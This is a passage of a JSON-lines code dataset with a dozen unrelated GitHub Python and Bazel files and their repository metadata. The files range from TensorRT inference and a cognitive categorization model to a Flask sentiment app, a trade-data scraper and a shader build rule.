range(p.num_errors):\n\t\t\t\t\t\t\t\t\tprint(p.get_error(err))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlogger.log(trt.Logger.INFO, 'Onnx file parsed successfully')\n\n\t\t\t\t\t\tnet.get_input(0).dtype=trt.DataType.HALF\n\t\t\t\t\t\tnet.get_output(0).dtype=trt.DataType.HALF\n\t\t\t\t\t\t#we set the inputs and outputs to be float16 type to enable\n\t\t\t\t\t\t#maximum fp16 acceleration. Also helps for int8\n\t\t\t\t\t\t\n\t\t\t\t\t\tconfig=builder.create_builder_config()\n\t\t\t\t\t\t#we specify all the important parameters like precision, \n\t\t\t\t\t\t#device type, fallback in config object\n\n\t\t\t\t\t\tconfig.max_workspace_size = self.maxworkspace\n\n\t\t\t\t\t\tif self.precision_str in ['FP16', 'INT8']:\n\t\t\t\t\t\t\tconfig.flags = ((1<=self.n_samples, f'Not enough images available. Requested {self.n_samples} images for calibration but only {len(all_images)} are avialable in {self.imgdir}'\n\t\tused=all_images[:self.n_samples]\n\t\tself.images=[os.path.join(self.imgdir,f) for f in used]\n\n\t\tnbytes=self.batch_size*3*self.input_size[0]*self.input_size[1]*self.iotype(1).nbytes\n\t\tself.buffer=cuda.mem_alloc(nbytes)\n\n\tdef preprocess(self, img):\n\t\timg=cv2.resize(img,self.input_size)\n\t\timg=img[...,::-1] #bgr2rgb\n\t\timg=img.astype(np.float32)/255\n\t\timg=(img-self.pp_mean)/self.pp_stdev #normalize\n\n\t\timg=np.transpose(img,(2,0,1)) #HWC to CHW format\n\t\timg=np.ascontiguousarray(img[None,...]).astype(self.iotype)\n\t\t#NCHW data of type used by engine input\n\t\treturn img\n\n\tdef get_batch(self, names):\n\t\tif self.images_read+self.batch_size < self.n_samples:\n\t\t\tbatch=[]\n\t\t\tfor idx in range(self.images_read,self.images_read+self.batch_size):\n\t\t\t\timg=cv2.imread(self.images[idx],1)\n\t\t\t\tintensor=self.preprocess(img)\n\t\t\t\tbatch.append(intensor)\n\n\t\t\tbatch=np.concatenate(batch, axis=0)\n\t\t\tcuda.memcpy_htod(self.buffer, batch)\n\t\t\tself.images_read+=self.batch_size\n\t\t\treturn [int(self.buffer)]\n\t\telse:\n\t\t\treturn None\n\t\t\n\tdef get_batch_size(self):\n\t\treturn self.batch_size\n\n\tdef read_calibration_cache(self):\n\t\tif os.path.exists(self.cache_path):\n\t\t\twith open(self.cache_path, \"rb\") as f:\n\t\t\t\treturn f.read()\n\n\tdef write_calibration_cache(self, cache):\n\t\twith open(self.cache_path, 'wb') as f:\n\t\t\tf.write(cache)\n\ndef infervideo_2DLAs(infile, onnxpath, calibrator=None, precision='INT8',display=False):\n\tsrc=cv2.VideoCapture(infile)\n\tseg1=TRTSegmentor(onnxpath, colors, device='DLA', precision=precision ,calibrator=calibrator, dla_core=0)\n\tseg2=TRTSegmentor(onnxpath, colors, device='DLA', precision=precision ,calibrator=calibrator, dla_core=1)\n\tret1,frame1=src.read()\n\tret2,frame2=src.read()\n\tfps=0.0\n\t\n\twhile ret1 and ret2:\n\t\tintensor1=seg1.preprocess(frame1)\n\t\tintensor2=seg2.preprocess(frame2)\n\t\t\n\t\tstart=time.time()\n\n\t\tcuda.memcpy_htod_async(seg1.d_input, intensor1, seg1.stream)\n\t\tcuda.memcpy_htod_async(seg2.d_input, intensor2, seg2.stream)\n\n\t\tseg1.context.execute_async_v2(seg1.bindings, seg1.stream.handle, None)\n\t\tseg2.context.execute_async_v2(seg2.bindings, seg2.stream.handle, None)\n\n\t\tcuda.memcpy_dtoh_async(seg1.output, seg1.d_output, seg1.stream)\n\t\tcuda.memcpy_dtoh_async(seg2.output, seg2.d_output, seg2.stream)\n\n\t\tseg1.stream.synchronize()\n\t\tseg2.stream.synchronize()\n\n\t\tend=time.time()\n\t\tif display:\n\t\t\tdrawn1=seg1.draw(frame1)\n\t\t\tdrawn2=seg2.draw(frame2)\n\t\t\tcv2.imshow('segmented1', drawn1)\n\t\t\tcv2.imshow('segmented2', drawn2)\n\t\t\tk=cv2.waitKey(1)\n\t\t\tif k==ord('q'):\n\t\t\t\tbreak\n\n\t\tfps=0.9*fps+0.1*(2.0/(end-start))\n\t\tprint('FPS = {:.3f}'.format(fps))\n\n\t\tret1,frame1=src.read()\n\t\tret2,frame2=src.read()\n\nif __name__ == '__main__':\n\n\tparser=argparse.ArgumentParser(description='TensorRT python tutorial')\n\t\n\tparser.add_argument('--precision', type=str, \n\t\tdefault='fp16', choices=['int8', 'fp16', 'fp32'],\n\t\thelp='precision FP32, FP16 or INT8')\n\n\tparser.add_argument('--device', type=str, \n\t\tdefault='gpu', choices=['gpu', 'dla', 'dla0', 'dla1', '2DLAs'],\n\t\thelp='GPU, DLA or 2DLAs')\n\n\tparser.add_argument('--infile', type=str, required=True,\n\t\thelp='path of input video file to infer on')\n\n\targs=parser.parse_args()\n\n\tcalibrator=Calibrator('./val2017/', 5000)\n\n\tif args.device=='2DLAs':\n\t\tprecision=args.precision.upper()\n\t\tinfervideo_2DLAs(args.infile, './segmodel.onnx', calibrator, precision)\n\n\telse:\n\t\tdevice=args.device.upper()\n\t\tprecision=args.precision.upper()\n\t\tdla_core=int(device[3:]) if len(device)>3 else 0\n\t\tdevice=device[:3]\n\t\t\n\t\tseg=TRTSegmentor('./segmodel.onnx', colors, \n\t\t\tdevice=device, \n\t\t\tprecision=precision,\n\t\t\tcalibrator=calibrator, \n\t\t\tdla_core=dla_core)\n\t\t\n\t\tseg.infervideo(args.infile)\n\n\tprint('Inferred successfully')\n","repo_name":"spmallick/learnopencv","sub_path":"industrial_cv_TensorRT_python/pytrt.py","file_name":"pytrt.py","file_ext":"py","file_size_in_byte":12635,"program_lang":"python","lang":"en","doc_type":"code","stars":19546,"dataset":"github-code","pt":"20"} +{"seq_id":"24163468769","text":"'''\n!!! INCOMPLETE !!!\n\nRational Model of Categorization (Anderson 1990-91)\n- - - - - - - - - - - - - - - - - - - - - - - - - - - \n\nBasic Idea:\n + a category label is a feature to be predicted by category-specific generative models of the data\n + the feature can be predicted optimially by combining:\n (a) the liklihood of an object belonging to a cluster given it's features\n (b) the liklihood of an object having some feature given the cluster (the predicted feature in this case is the category label)\n\n P(j|F) = P(k|F) * P(j|k)\n\n for all K clusters\n\n P(k|F) is the posterior probability that an object belongs to a cluster (relative to all other clusters). This is given by a luce-choice over the probilities of all clusters:\n\n P(k|F) = p(k) * p(F|k) / sum( p(k) * p(F|k) for all k in K )\n\n p(k) * p(F|k) <-- that part is naive bayes i think\n\n p(k) is given by the equation:\n\n p(k) = c * n_k / (1 - c) + cn\n\n n_k: number of items in partition k\n n: total number of items\n \n ^ so essentially, i think that those combined give us a baserate of a given cluster\n\n as Anderson (1991) puts it: this creates a strong \"bias to put new items into [already existing] large categories\"\n\n The probability that something is asigned to a new category is:\n P(0) = (1 - c) / ( (1-c) + cn )\n\n p(F|k) = product( P(j|k) for j in F)\n\n Notes:\n - the coupling parameter C tries to manipulate the liklihood that exemplars will be \"grouped\" into a cluster\n - when C is 0: each example gets it's own cluster\n - wtf is going on this the discrete -vs- continuous thing?\n\n\n'''\nimport numpy as np; np.set_printoptions(linewidth = 10000)\n\nimport matplotlib.pyplot as plt \n\ng = 20\nparam_space = [\n np.linspace(0,1,g),\n np.linspace(0,1,g),\n]\nmesh = np.array(np.meshgrid(*param_space)).reshape(2,g*g).T\n\ndef gaussian_kernelv(x, data_mean, data_std):\n exponent = np.exp(- ((x - data_mean) ** 2 / (2 * data_std ** 2) ))\n return (1 / (np.sqrt(2 * np.pi) * data_std) * exponent)\n\n\n# RMC\ndef predict_rmc(inputs, data, labels):\n # we want: P(j|F) <-- ie, given a set of features (the stimulus), what is the liklihood it has a feature j? (j being the category label)\n # we need: p(k|F) and p(j|k)\n\n\n # just going to assume we already know the clusters (lets say C is zero and each exemplar is it's own cluster)\n p_j__k = None\n p_k__F = None\n\n # get prob k given f: prob_k__F\n p_k = np.array([1 / data.shape[0] for cluster in data]) # <-- since each examplar has an equal base rate (im kind of cheating here)\n p_F__k = np.array([gaussian_kernelv(inputs, cluster, .1) for cluster in data])\n p_F__k = np.product(p_F__k, axis = -1)\n p_k__F = (p_F__k * p_k) / np.sum(p_F__k * p_k, axis = 0)\n\n # get prob j given k: p_j__k <-- i think this is just the category association weights\n p_j__k = np.zeros([inputs.shape[0], len(np.unique(labels))])\n p_j__k[labels == 'Iris-setosa',0] = 1\n p_j__k[labels == 'Iris-versicolor',1] = 1\n p_j__k[labels == 'Iris-virginica',2] = 1\n\n\n # combine them:\n response_probs = p_k__F @ p_j__k # <-- there's something wrong here, since the sum of the probabilities dont add to 1\n\n return response_probs\n\n\n\n\n\n\n\n\n\n# naive_bayes probability\ndef predict_nb(inputs, data, labels):\n c = {}\n for category in categories:\n c[category] = {\n 'data': data[labels == category],\n }\n c[category]['base_rate'] = c[category]['data'].shape[0] / data.shape[0]\n\n class_probabilities = []\n\n for category in categories:\n class_probabilities.append(\n np.multiply(\n gaussian_kernelv(inputs, c[category]['data'].mean(axis = 0), c[category]['data'].std(axis = 0)),\n c[category]['base_rate']\n )\n )\n\n class_probabilities = np.product(np.array(class_probabilities), axis = -1).T\n return class_probabilities / class_probabilities.max(axis = 1, keepdims = True) # <-- luce choice\n\n\nif __name__ == '__main__':\n data = np.genfromtxt('iris.csv', delimiter = ',',dtype = float)[:,:-1]\n labels = np.genfromtxt('iris.csv', delimiter = ',', dtype = str)[:,-1]\n categories = np.unique(labels)\n \n # data = np.array([\n # [.1, .4],\n # [.2, .3],\n # [.3, .2],\n # [.4, .1],\n\n # [.6, .9],\n # [.7, .8],\n # [.8, .7],\n # [.9, .6],\n # ])\n\n # labels = [\n # 0,0,0,0, 1,1,1,1, \n # ]\n\n # categories = np.unique(labels)\n\n probs = predict_rmc(\n data, data, labels\n )\n\n # probs = predict_nb(\n # # input data, reference data, reference labels\n # data, data, labels\n # )\n \n\n ##__Plot Results\n import matplotlib.pyplot as plt \n\n fig, ax = plt.subplots(\n 1,1, \n # figsize = [4,2]\n )\n ax.imshow(\n probs,\n cmap = 'binary', aspect = 'auto', vmin = 0, vmax = 1\n )\n ax.set_xticks(range(len(categories)))\n ax.set_xticklabels(categories)\n\n ax.set_yticks(range(data.shape[0]))\n ax.set_yticklabels([\n ' ' if categories[probs[item,:].argmax()] == labels[item] else 'x'\n for item in range(data.shape[0])\n ])\n ax.set_ylabel('items\\n(x = incorrect prediction)\\n')\n ax.set_title('Class Probabilities')\n\n plt.savefig('test.png')\n\n\n\n # ##__Plot Results\n # import matplotlib.pyplot as plt \n\n # fig, [ax,ax2] = plt.subplots(1,2, figsize = [4,2])\n\n # ax.imshow(\n # probs,\n # cmap = 'binary', aspect = 'auto', vmin = 0, vmax = 1\n # )\n # ax.set_xticks(range(len(categories)))\n # ax.set_xticklabels(categories)\n\n # ax.set_yticks(range(data.shape[0]))\n # ax.set_yticklabels([\n # ' ' if categories[probs[item,:].argmax()] == labels[item] else 'x'\n # for item in range(data.shape[0])\n # ])\n # ax.set_ylabel('items\\n(x = incorrect prediction)\\n')\n # ax.set_title('Class Probabilities')\n\n\n # ax2.scatter(\n # *data.T,\n # c = labels\n # )\n\n # plt.tight_layout()\n # plt.savefig('test.png')\n","repo_name":"mw3i/cogmods","sub_path":"_/RMC-exemplar_reduced.py","file_name":"RMC-exemplar_reduced.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"42572723262","text":"willend = []\n\nstart = 2\nstop = 40\nprint(f\"{start} -> {stop}\")\nfor i in range(2, 40):\n n = i\n while True:\n if n not in willend:\n willend.append(n)\n if n % 2 == 0:\n # turns into float during division\n n = int(n / 2)\n else:\n n = n * 3 + 1\n if n == 1:\n break\n else:\n break\n \n # return n\n\nprint()\nwillend.sort()\n# WOW! Gap-between-nums bar chart!\n# for i in range(1, len(willend)):\n# dif = (willend[i] - willend[i-1])\n# if dif > 1:\n# print(\"x, \" * dif)\nprint(willend)\n# for i in range(1, len(willend)):\n# dif = (willend[i] - willend[i-1])\n# if dif > 1:\n# print(\"x, \", end=\"\")\n# # print(\"x, \" * (dif - 1), end=\"\")\n# print(willend[i], end=\", \")\nprint()\n\nn = int(input())\ncycles = 1\nwhile True:\n if n == 1:\n print(cycles)\n break\n if n % 2 == 0:\n # turns into float during division\n n = int(n / 2)\n else:\n n = n * 3 + 1\n cycles += 1\n\n\n\nfor i in range(2, 15):\n n = i\n print(n, end=\", \")\n while True:\n if n % 2 == 0:\n # turns into float during division\n n = int(n / 2)\n else:\n n = n * 3 + 1\n print(n, end=\", \")\n if n == 1:\n print(\"end\", end=\"\\n\")\n break\n # return n\n","repo_name":"DustinWestGlow/Code","sub_path":"collatz/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"16564998777","text":"from PyQt5.QtWidgets import QGroupBox\n\nfrom utils import get_ui_spacing\n\n\nclass BaseGroupBoxWidget(QGroupBox):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n margin = get_ui_spacing(\"lg\")\n self.setContentsMargins(margin, margin, margin, margin)\n","repo_name":"briannice/snoop","sub_path":"widgets/base/base_group_box_widget.py","file_name":"base_group_box_widget.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8232169724","text":"from sympy import symbols, sympify, lambdify\nfrom sympy.abc import x, h\nimport variants\n\nROUNDBASE = 2\nINTER_ORD = 5\nDERIV_ORD = 1\nKNOT = 0\nN_KNOTS = 11\n\nv = variants.v10\nlb = v['a']\nrb = v['b']\ny = lambdify(x, v['y'])\ngap = round((rb - lb) / (N_KNOTS - 1), ROUNDBASE)\n\n# builds polynom of given order\nknots = symbols(f\"x:{INTER_ORD + 1}\")\nvalues = symbols(f\"y:{INTER_ORD + 1}\")\n\npolynom = sympify('0')\nfor i in range(INTER_ORD + 1):\n monom = sympify('1')\n for j in range(INTER_ORD + 1):\n if i == j: continue\n monom *= (x - knots[j]) / sympify(f\"{i}-{j}\", evaluate=False) / h\n monom *= values[i]\n polynom += monom\n\n\nderiv = polynom.diff(x, DERIV_ORD)\n\npt = lb\n\nfor i in range(INTER_ORD + 1):\n deriv = deriv.subs(knots[i], pt).subs(values[i], y(pt))\n pt += gap\n\nderiv = deriv.subs(h, gap).simplify()\n\nderiv.subs(x, lb + KNOT * gap)\n","repo_name":"the-makcym/nummeth","sub_path":"lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3396779053","text":"from discord.ext import commands\n\nfrom cogs.src._chatGpt import Gpt\n\n\nclass openai(commands.Cog):\n def __init__(self, bot, api_key):\n self.bot = bot\n self.gpt = Gpt(api_key)\n\n @commands.command()\n async def chat_gpt(self, ctx, *args):\n texte = \" \".join(args)\n response = self.gpt.call_chat(texte)\n await self.bot.send_message(ctx, response, False)\n\n @commands.command()\n async def img_gpt(self, ctx, *args):\n texte = \" \".join(args)\n response = self.gpt.call_image(texte)\n await self.bot.send_message(ctx, response, False)\n\n @commands.command()\n async def trad_gpt(self, ctx, *args):\n lang = args[0]\n texte = \" \".join(args[1:])\n response = self.gpt.call_traduction(lang, texte)\n await self.bot.send_message(ctx, response, False)\n","repo_name":"DevRickyCst/chatGptDiscord","sub_path":"cogs/openai.py","file_name":"openai.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"24221704576","text":"#!/usr/bin/env python\n# coding:utf-8\nimport _env\nfrom _route import route\nfrom zapp._WEB.model.session import Session\nfrom zapp._WEB.view._rpc.client import ClientRpcView as View\nfrom zapp._WEB.model.sso_sign import sso_sign\nfrom zapp._WEB.model.id_by_sso import id_by_sso_id, sso_id_by_id\nfrom zapp._WEB.model.ob_mail import ob_mail_set \nfrom zapp._WEB.view._rpc import RpcView, rpc_url, Err, logined, LoginedRpcView\nfrom zapp._WEB.model.sign import Sign\nfrom zapp._WEB.model.user_info import user_info_id_get, user_info_id_set\nfrom z42.config import HOST\nfrom zapp._WEB.model.ob import Ob\n\n@route(\"sso\")\nclass _(View):\n def login(self, session, user_info_id, expires_days):\n sso_id, binary = Session.decode(session, False)\n\n user_id = id_by_sso_id(sso_id)\n self.set_cookie(\"S\", Session.set(user_id, binary), domain=\".\"+HOST, expires_days=expires_days)\n\n if user_info_id != user_info_id_get(sso_id):\n self.redirect(\n sso_sign(\n sso_id,\n binary,\n \"user.sync\",\n dict(\n info = \"mail name ico sign phone\",\n )\n )\n )\n\n def sync( self, sso_id, user_info_id, mail=None, ico=None, name=None, sign=None, phone=None,):\n user_id = id_by_sso_id(sso_id)\n ob = Ob.find_one(dict(id=user_id))\n if ob is None:\n ob = Ob(dict(id=user_id))\n\n if ico:\n ob.ico = ico\n\n if name:\n ob.name = name\n\n ob.save()\n\n if sign:\n Sign.new(user_id, sign)\n\n if mail is not None:\n ob_mail_set(user_id, mail)\n\n user_info_id_set(sso_id, user_info_id)\n\n\n\nif __name__ == \"__main__\":\n pass\n# print user_info_id_get(9912698)\n# print sso_id, user_id, \"!!!!!!!\", type(user_id), ob.name\n\n\n","repo_name":"PegasusWang/collection_python","sub_path":"z42/zapp/_WEB/view/rpc/sso.py","file_name":"sso.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"20"} +{"seq_id":"74293331250","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys, os\nimport logging\nimport subprocess\nimport shutil\nimport tempfile\nimport json\n\n\n#global paths variables\nwith open('.deploy') as json_file:\n _app_repo = json.load(json_file)\n\n\n#logging\nlogging.basicConfig()\n_logger = logging.getLogger(\"Activate\")\n_logger.setLevel(logging.DEBUG)\n\ndef _parse_input():\n\t# Create the parser and add arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-v\", dest='version', help=\"Version to activate\")\n\tparser.add_argument(\"-a\", dest='app', required=True, help=\"App\", choices=['server','web'])\n\t\n\targs = parser.parse_args()\n\tsource = _app_repo[args.app]\n\n\treturn args.version, source, args.app\n\n\n\ndef run(version, source, app):\n\tdestination = os.path.join('src',app)\n\t_logger.info(\"Building destination path {0}\".format(destination))\n\n\t# validate input ( version, app, phase, process)\n\t_logger.info(\"Fetching {0} from {1}\".format(version, source))\n\n\tnew_version = not os.path.exists(destination)\n\tif new_version:\n\t\tcmd = \"git clone \"+source+ \" \"+ destination\n\t\t_logger.debug(\"{0}\".format(cmd))\n\t\toutput = subprocess.check_output(cmd.split())\n\t\t_logger.info(output)\n\n\tif version and not new_version:\n\t\tcwd = os.getcwd()\n\t\tos.chdir(cwd)\n\t\tcmd = \"git checkout \"+ (version or '')\n\t\t_logger.debug(\"{0}\".format(cmd))\n\t\toutput = subprocess.check_output(cmd.split())\n\t\t_logger.info(output)\n\n\n\treturn True\n\n\nif __name__ == '__main__':\n\tversion, source, app= _parse_input()\n\t_logger.info(\"--------------------------\")\n\t_logger.info(\"Version: {0}\".format(version))\n\t_logger.info(\"Source: {0}\".format(source))\n\t_logger.info(\"App: {0}\".format(app))\n\t_logger.info(\"--------------------------\")\n\n\tif not run(version, source, app):\n\t\t_logger.info(\"--------------------------\")\n\t\t_logger.info(\"Deploy failed\")\n\t\t_logger.info(\"--------------------------\")\n\n\t\tsys.exit(-1)\n\telse:\n\t\t_logger.info(\"--------------------------\")\n\t\t_logger.info(\"Deploy completed\")\n\t\t_logger.info(\"--------------------------\")\n\n\n\n\n\n","repo_name":"enzomar/omb","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"36796808888","text":"#!/usr/bin/python\n#Andrew Stershic, 10/20/2014\n\ndef str2num(a):\n #remove comma from large numbers\n if (len(a) == 0):\n return 0\n return float(a.replace(',',''))\n\nimport sys\nimport re\nimport mechanize\n\n#set target url\nurl = 'http://commerce.nic.in/eidb/icomq.asp'\nyear = 2014\nif len(sys.argv) > 1:\n\tyear = sys.argv[1]\nfruitcode = \"0702\"\n\nbr = mechanize.Browser()\nbr.open(url)\n\nbr.select_form(name=\"form1\")\n\n#set year\nbr[\"yy1\"] = [str(year)]\n\n#select tomato = \"0702\"\nbr[\"hscode\"] = fruitcode\n\n#submit\nresponse = br.submit()\n\n#save results\n#f = open(\"tmp.htm\",\"w\")\n#f.write(response.read())\n#f.close()\n\n\n#read results\nfrom bs4 import BeautifulSoup\n\n#page = open('tmp.htm','r')\npage = response.read() \nsoup = BeautifulSoup(page)\n\nallTR = soup.find_all('tr')\nTR1 = []\nTR2 = []\nfor i in range(0,len(allTR)):\n tr = allTR[i]\n tds = tr.find_all('td')\n for td in tds:\n# print td.text.strip()\n if (i == 1):\n TR1.append(str(td.text.strip()))\n if (i == 2):\n TR2.append(str(td.text.strip()))\n\n#save results to variables\nsNo = TR1[0]\nHSCode = TR1[1]\nCommodity = TR1[2]\nQtyYear = str2num(TR1[3])\nTotImportYear = str2num(TR2[3])\nPctShareYear = str2num(TR1[4])\nQtyCurrent = str2num(TR1[5])\nTotImportCurrent = str2num(TR2[5])\nPctShareCurrent = str2num(TR1[6])\nPctGrowth = str2num(TR1[7])\nTotImportPctGrowth = str2num(TR2[7])\n\n\nline = \"%s,%s,%s,%s,%f,%f,%f,%f,%f,%f,%f,%f\\n\" % (year,sNo,HSCode,Commodity,QtyYear,TotImportYear,PctShareYear,QtyCurrent,TotImportCurrent,PctShareCurrent,PctGrowth,TotImportPctGrowth)\nheader = \"#year,sNo,HSCode,Commodity,QtyYear,TotImportYear,PctShareYear,QtyCurrent,TotImportCurrent,PctShareCurrent,PctGrowth,TotImportPctGrowth\\n\"\n\nf = open(\"commerce_output.csv\",'w')\nf.write(header)\nf.write(line)\nf.close()\n\n\n#results (commented)\n#***---results---***\n#sNo 1.\n#HSCode 0702\n#Commodity TOMATOES, FRESH OR CHILLED\n#QtyYear 1.38\n#TotImportYear 266916195.69\n#PctShareYear 0.0\n#QtyCurrent 1.78\n#TotImportCurrent 271543390.74\n#PctShareCurrent 0.0\n#PctGrowth 29.17\n#TotImportPctGrowth 1.73\n\n","repo_name":"astershic/ceres","sub_path":"commerce/commerce.py","file_name":"commerce.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12931624029","text":"from typing import List, Tuple\n\n\ndef calc_figure_area(points: List[Tuple[float]]) -> float:\n \"\"\"Функция расчёта площади фигуры по координатам точек на плоскости.\"\"\"\n total = 0\n for i in range(len(points)):\n if len(points[i]) != 2:\n raise ValueError(\n 'Для расчёта площади необходимо '\n 'два значения в одной координате'\n )\n if i == len(points) - 1:\n break\n if (not isinstance(points[i][0], (int, float))\n or not isinstance(points[i][1], (int, float))):\n raise TypeError(\n 'Для расчёта площади необходимо передавать численные значения'\n 'координат точек на плоскости'\n )\n side_a = abs(points[i][1])\n side_b = abs(points[i+1][1])\n high = points[i+1][0] - points[i][0]\n s = high * (side_a + side_b) / 2\n total += s\n return total\n","repo_name":"RoostiqueTheMan/test_work_for_sigma","sub_path":"calc_figure_area.py","file_name":"calc_figure_area.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26899645308","text":"import os\nimport pickle\n\nfrom flask import request\nfrom flask import jsonify\nfrom flask import Flask, render_template\nfrom keras.models import load_model\n\nfrom train import train\nfrom word2vec import find_similarity, load_embedding\nfrom utils import read_data, preprocess_df, tokenize_data\nfrom constants import MAX_WORDS\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef my_form():\n return render_template('index.html')\n\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n request_dict = request.form.to_dict()\n sentiment = False\n word2vec = False\n\n if 'text' in request_dict.keys():\n text = request.form['text']\n text = read_data(text)\n text = preprocess_df(text)\n text = tokenize_data(tokenizer, text['review'], max_words=MAX_WORDS)\n score = model.predict(text)\n\n if score > 0.5:\n label = 'This sentence is positive'\n elif score == 0.5:\n label = 'This sentence is neutral'\n else:\n label = 'This sentence is negative'\n sentiment = True\n\n if 'word2vec' in request_dict.keys():\n word = request.form['word2vec']\n print(word)\n similar_df = find_similarity(word, embedding)\n print(similar_df)\n column_names = similar_df.columns.values\n row_data = list(similar_df.values.tolist())\n link_column = \"Patient ID\"\n word2vec = True\n\n if sentiment and word2vec:\n return render_template('index.html', variable=label, column_names=column_names, row_data=row_data, link_column=link_column, zip=zip)\n elif sentiment:\n return render_template('index.html', variable=label)\n elif word2vec:\n return render_template('index.html', column_names=column_names, row_data=row_data, link_column=link_column, zip=zip)\n else:\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n print('Loading embedding...')\n embedding = load_embedding()\n print('Success!')\n\n if not os.path.exists(os.path.join('models', 'sentiment_analysis_model.h5')):\n train()\n model = load_model(os.path.join('models', 'sentiment_analysis_model.h5'))\n # loading\n with open('tokenizer.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n\n app.run(port='8088', threaded=False)\n","repo_name":"odedovadia/WebML","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"30592762441","text":"import subprocess\nimport os\n\nf = open(\"tsvFiles.txt\")\nf2 = open(\"id.txt\",\"w\")\n\nfor d in f:\n\td = d.rstrip()\n\twords = d.split(\"/\")\n\tcm = \"cp \" + d + \" temp\"\n\tos.system(cm)\n\tos.system(\"sed -i '1d' temp\")\n\tos.system(\"awk '{print $2,$3,$4,$5,$6,$7}' temp >> optitype.hla.txt\")\n\tf2.write(words[2])\n\tf2.write(\"\\n\")\nf.close()\nf2.close()\n\n\n","repo_name":"felixfan/pipelines","sub_path":"NGSHLATying/OptiTypeReadHLAgeno.py","file_name":"OptiTypeReadHLAgeno.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31682266160","text":"def get_varying_def(source_file, varying_defs, default_def):\n for varying_def in varying_defs:\n if source_file.dirname == varying_def.dirname:\n return varying_def\n\n return default_def\n\n\ndef _shaderc_impl(ctx):\n shaderc_path = ctx.attr.tooling.files.to_list()[0].path\n print('Using shader tooling: ' + shaderc_path)\n\n common = [\n f for t in ctx.attr.common for f in t.files.to_list()\n ]\n\n shaders = [\n f for t in ctx.attr.shaders for f in t.files.to_list()\n ]\n bgfx_shader = ctx.attr.bgfx_shader\n\n runtime_files = []\n header_out = ctx.actions.declare_file('generated_shaders.hpp')\n\n\n frags_and_verts = []\n varying_defs = []\n root_varying_def = None\n frags = []\n verts = []\n\n for f in shaders:\n if 'varying.def.sc' in f.short_path:\n varying_defs.append(f)\n\n if root_varying_def == None or len(root_varying_def.short_path) > len(f.short_path):\n root_varying_def = f\n else:\n frags_and_verts.append(f)\n\n\n shader_params = [\n ('glsl', 'linux', '440'),\n ('spirv', 'linux', 'spirv'),\n ('metal', 'osx', 'metal'),\n ('dx11', 'windows', '420'),\n ]\n\n\n for f in frags_and_verts:\n name = f.basename.replace('.sc', '')\n outdir = f.dirname.split('resources/shaders')[1].strip('/')\n\n relative_path = name\n if outdir != '':\n relative_path = outdir + '/' + name\n\n shader_type = ''\n if '.fs' in name:\n shader_type = 'f'\n frags.append((name.replace('.fs', ''), relative_path, outdir))\n elif '.vs' in name:\n shader_type = 'v'\n verts.append((name.replace('.vs', ''), relative_path, outdir))\n\n for render_type_dir, platform, render_type in shader_params:\n outpath = 'resources/shaders/' + render_type_dir + '/' + outdir + '/' + name + '.bin'\n\n varying_def = get_varying_def(f, varying_defs, root_varying_def)\n\n out = ctx.actions.declare_file(outpath)\n runtime_files.append(out)\n\n ctx.actions.run_shell(\n outputs=[out],\n inputs=depset([\n f,\n varying_def,\n bgfx_shader.files.to_list()[0],\n ] + common),\n tools=depset([\n ctx.attr.tooling.files.to_list()[0],\n ]),\n command=shaderc_path + ' '.join([\n ' -f',\n f.path,\n '-o',\n out.path,\n '--type',\n shader_type,\n '--platform',\n platform,\n '-p',\n render_type,\n '-i',\n bgfx_shader.files.to_list()[0].dirname,\n '-i',\n root_varying_def.dirname,\n '--varyingdef',\n varying_def.path,\n ]),\n progress_message='Compiling shader: ' + f.path,\n mnemonic = 'ShaderCompile'\n )\n\n frag_lines = []\n for program_name, outpath, outdir in frags:\n if outdir:\n frag_lines.append('namespace ' + outdir.replace('/', '::') + ' {')\n frag_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n frag_lines.append('}')\n else:\n frag_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n\n vert_lines = []\n for program_name, outpath, outdir in verts:\n if outdir:\n vert_lines.append('namespace ' + outdir.replace('/', '::') + ' {')\n vert_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n vert_lines.append('}')\n else:\n vert_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n\n generated_lines = [\n '#pragma once',\n '#include ',\n '// -------- autogenerated ---------',\n 'namespace generated::shaders {',\n 'namespace frag {'\n ] + frag_lines + [\n '} // namespace frag',\n 'namespace vert {'\n ] + vert_lines + [\n '} // namespace vert',\n '} // namespace 